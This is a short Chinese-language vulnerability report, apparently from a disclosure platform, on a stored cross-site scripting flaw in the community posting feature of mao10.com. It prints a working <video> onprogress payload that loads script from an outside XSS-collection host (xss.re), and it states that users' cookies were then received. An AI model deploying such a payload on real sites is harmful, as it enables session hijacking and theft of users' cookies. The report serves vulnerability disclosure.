### 简要描述:
rt
### 详细说明:
过滤不严。
以官网为例。
社区发布新话题
[<img src="https://images.seebug.org/upload/201501/10171718d194a4fdae1259a045f25d045e542fb0.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171718d194a4fdae1259a045f25d045e542fb0.jpg)
```
<video width="0" height="0" src="http://www.baidu.com/img/bd_logo1.png" onprogress="document.body.appendChild(document.createElement(/script/.source)).src=id" id="http://xss.re/6896"></video>
```
成功加载了js
[<img src="https://images.seebug.org/upload/201501/101718199a8628bdcf3267a0ed81d32c7f044d9c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101718199a8628bdcf3267a0ed81d32c7f044d9c.jpg)
地址 http://www.mao10.com/post-1772.html
然后用户的cookie就来了。。。
[<img src="https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1017191916d1ae1066ddd029e344ef3514a7949d.png)
暂无评论